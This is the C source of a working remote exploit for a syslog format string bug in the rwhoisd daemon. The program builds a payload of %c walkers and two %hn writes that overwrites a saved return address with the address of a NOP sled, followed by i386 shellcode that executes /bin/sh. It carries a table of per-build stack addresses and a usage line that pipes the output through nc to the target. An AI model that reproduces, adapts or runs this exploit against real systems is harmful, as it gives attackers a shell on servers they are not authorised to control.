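/*
 * by alert7 -- Rwhoisd syslog format string bug exploit demo
 * usage: (./e [localhost ip len];cat )|nc 127.0.0.1 4321
 * 2001-11-20
 *
 * The vulnerable daemon hands attacker-controlled text to syslog() as the
 * format string.  This program prints a payload that (1) walks printf's
 * argument cursor forward with bare "%c" conversions until it reaches the
 * payload bytes themselves, then (2) uses two "%Nc%hn" pairs to write the
 * 32-bit address of the trailing NOP sled + shellcode, one 16-bit half at a
 * time, over a saved return address in the daemon's stack frame ("retloc").
 * Every address is a fixed per-build constant taken from the version[] table
 * (32-bit Linux, no ASLR), so the demo only fires against exactly those
 * builds; anything else just crashes the daemon's worker.
 *
 * NOTE(review): the copy this file was restored from had lost the header
 * names on the two #include lines and a short run of main() (the filler loop
 * and the opening of the SH1 < SH2 branch).  Both are reconstructed below and
 * marked as such; confirm against an intact copy if one is available.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Per-target stack layout.  The payload arithmetic assumes
 * formatstring_addr > formatstring_argv, i.e. the logged text sits above
 * syslog's first variadic argument on the stack.
 */
struct version {
    char *name;                     /* human-readable target description          */
    unsigned int formatstring_addr; /* stack address of the logged text           */
    unsigned int formatstring_argv; /* stack address of the first vararg slot     */
    unsigned int retloc;            /* stack address of the saved return address  */
};

/* Table of known targets; the entry with a NULL name terminates it. */
struct version version[] = {
    { "Linux x86 6.1 rwhoisd-1.5.7.1 src", 0xbffff780, 0xbffff56c, 0xbffff3a4 },
    { "Linux x86 6.2 rwhoisd-1.5.7.1 src", 0xbffff5d0, 0xbffff3bc, 0xbffff1f4 },
    { "Linux x86 7.1 rwhoisd-1.5.7.1 src", 0xbffff490, 0xbffff278, 0xbffff05c },
    { "Linux x86 6.2 rwhoisd-1.5.7.2 src", 0xbffff64c, 0xbffff438, 0xbffff270 },
    { NULL, 0, 0, 0 }
};

/*
 * 32 NOPs (landing zone, since shell_addr is only approximately right),
 * then i386 Linux shellcode: an int 0x80 with eax=0x3f (dup2) followed by
 * the classic jmp/call/pop execve("/bin/sh") stub and an exit.
 */
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\x31\xdb\x31\xc9\x43\x41\x41\xb0\x3f\xcd\x80"
    "\xeb\x25\x5e\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43"
    "\x2c\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb\x89\xd8"
    "\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh";

/* Append v as four little-endian bytes at *p and advance *p past them. */
static void put_le32(char **p, unsigned long v)
{
    char *q = *p;

    *q++ = (char)(v & 0xff);
    *q++ = (char)((v >> 8) & 0xff);
    *q++ = (char)((v >> 16) & 0xff);
    *q++ = (char)((v >> 24) & 0xff);
    *p = q;
}

/*
 * Append one %hn slot: four filler bytes ('B') that the width-padded "%Nc"
 * consumes as its argument, then the address the following "%hn" writes to.
 */
static void put_hn_slot(char **p, unsigned long target)
{
    memset(*p, 'B', 4);
    *p += 4;
    put_le32(p, target);
}

/* Parse a decimal command-line number; exits with a message on junk. */
static long parse_num(const char *s, const char *what)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (*s == '\0' || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "bad %s: %s\n", what, s);
        exit(-1);
    }
    return v;
}

/*
 * Build the payload for version[argv[1]] and print it (payload, then
 * shellcode) on stdout for piping into nc.  argv[2], if given, is the length
 * of the client IP string that syslog prints ahead of our text; it shifts
 * every stack address by that much.  Exits non-zero on bad arguments or when
 * the computed layout cannot be expressed in the format string.
 */
int main(int argc, char *argv[])
{
    char buf[1024];                 /* payload bytes that precede the shellcode */
    char *ptr;
    long idx;
    int nver = (int)(sizeof version / sizeof version[0]) - 1; /* minus terminator */
    int i;
    int YOURIPLEN = 9;              /* strlen("127.0.0.1") */
    unsigned long retloc;           /* address holding the function's own return address */
    unsigned long shell_addr;       /* where the NOP sled lands in the daemon's buffer */
    unsigned int FORMATSTRING_ADDR; /* address of our text, i.e. of the format string */
    unsigned int FORMATSTRING_ARGV; /* address of the first argument slot the format string consumes */
    unsigned int DEFAULT_ALIGNMENT; /* 0..3 filler bytes so our slots are 4-aligned relative to ARGV */
    unsigned int paging;            /* byte distance the "%c"s must walk the argument cursor */
    unsigned int SH1, SH2;          /* high and low halfword of shell_addr */
    unsigned int lo, hi;            /* the two halfwords in write order */
    unsigned long lo_target, hi_target;
    unsigned int overhead;          /* bytes already printed when the first %hn fires */
    size_t need, room;
    int n;

    if (argc < 2) {
        printf("usage:( %s [localhost ip len];cat)|nc target port\n \ravailable support:\n", argv[0]);
        for (i = 0; version[i].name; i++)
            printf("(%d)\t%s\n", i, version[i].name);
        exit(-1);
    }

    /* Was version[atoi(argv[1])] with no range check: an out-of-bounds read. */
    idx = parse_num(argv[1], "target index");
    if (idx < 0 || idx >= nver) {
        fprintf(stderr, "target index out of range (0..%d)\n", nver - 1);
        exit(-1);
    }
    if (argc == 3) {
        long l = parse_num(argv[2], "ip length");
        if (l <= 0) {
            fprintf(stderr, "ip length must be positive\n");
            exit(-1);
        }
        YOURIPLEN = (int)l;
    }

    /* The syslog line carries a fixed prefix plus the client IP before our text. */
    FORMATSTRING_ADDR = version[idx].formatstring_addr + (unsigned int)YOURIPLEN + 16;
    FORMATSTRING_ARGV = version[idx].formatstring_argv;
    retloc = version[idx].retloc;
    if (FORMATSTRING_ADDR <= FORMATSTRING_ARGV) {
        /* The layout assumption documented on struct version does not hold. */
        fprintf(stderr, "format string must lie above the argument cursor\n");
        exit(-1);
    }

    DEFAULT_ALIGNMENT = 4 - (FORMATSTRING_ADDR - FORMATSTRING_ARGV) % 4;
    if (DEFAULT_ALIGNMENT == 4)
        DEFAULT_ALIGNMENT = 0;
    paging = FORMATSTRING_ADDR + DEFAULT_ALIGNMENT - FORMATSTRING_ARGV;

    /*
     * The sled starts after the filler, the two 8-byte slots, the "%c" run
     * (2 bytes each) and roughly 20 bytes of "%Nc%hn%Mc%hn"; the NOPs absorb
     * the slack in that estimate.
     */
    shell_addr = FORMATSTRING_ADDR + DEFAULT_ALIGNMENT + 8 * 2 + (paging / 4) * 2 + 20;
    SH1 = (unsigned int)((shell_addr >> 16) & 0xffff);
    SH2 = (unsigned int)(shell_addr & 0xffff);

    /* Two equal halves would need a single count; not handled by this demo. */
    if (SH1 == SH2) {
        printf("不会这么巧吧,今天可以去买彩票了:)\n");
        exit(0);
    }

    /*
     * %hn only records the running character count, which never decreases,
     * so the smaller halfword must be written first and the larger one is
     * reached by printing the difference.  Each halfword goes to its own
     * half of retloc (retloc+2 holds the high half on little-endian x86).
     */
    if (SH1 < SH2) {
        lo = SH1;
        lo_target = retloc + 2;
        hi = SH2;
        hi_target = retloc;
    } else {
        lo = SH2;
        lo_target = retloc;
        hi = SH1;
        hi_target = retloc + 2;
    }

    /* Everything syslog prints before the first %hn counts toward lo. */
    overhead = 8 * 2 + paging / 4 + DEFAULT_ALIGNMENT + (16 + (unsigned int)YOURIPLEN);
    if (lo <= overhead) {
        /* "%0c" still prints one byte, so the count would be off; refuse. */
        fprintf(stderr, "halfword 0x%x too small for %u bytes of overhead\n", lo, overhead);
        exit(-1);
    }

    /* Bound the payload before writing it; paging depends on user input. */
    need = (size_t)DEFAULT_ALIGNMENT + 2 * 8 + 2 * (size_t)(paging / 4);
    if (need >= sizeof buf) {
        fprintf(stderr, "payload of %zu bytes does not fit\n", need);
        exit(-1);
    }

    ptr = buf;
    /*
     * NOTE(review): reconstructed -- this loop was lost in the copy.  The
     * overhead accounting above budgets DEFAULT_ALIGNMENT printed bytes here,
     * so filler of that length is what the arithmetic expects.
     */
    for (i = 0; i < (int)DEFAULT_ALIGNMENT; i++)
        *ptr++ = 'A';
    put_hn_slot(&ptr, lo_target);
    put_hn_slot(&ptr, hi_target);
    /* One "%c" per 4-byte slot between ARGV and our filler. */
    for (i = 0; i < (int)(paging / 4); i++) {
        *ptr++ = '%';
        *ptr++ = 'c';
    }
    room = sizeof buf - (size_t)(ptr - buf);
    /* %hn is preferred over %n: two short writes avoid one huge count. */
    n = snprintf(ptr, room, "%%%uc%%hn%%%uc%%hn", lo - overhead, hi - lo);
    if (n < 0 || (size_t)n >= room) {
        fprintf(stderr, "format string tail does not fit\n");
        exit(-1);
    }

    printf("%s%s\n", buf, shellcode);
    return 0;
}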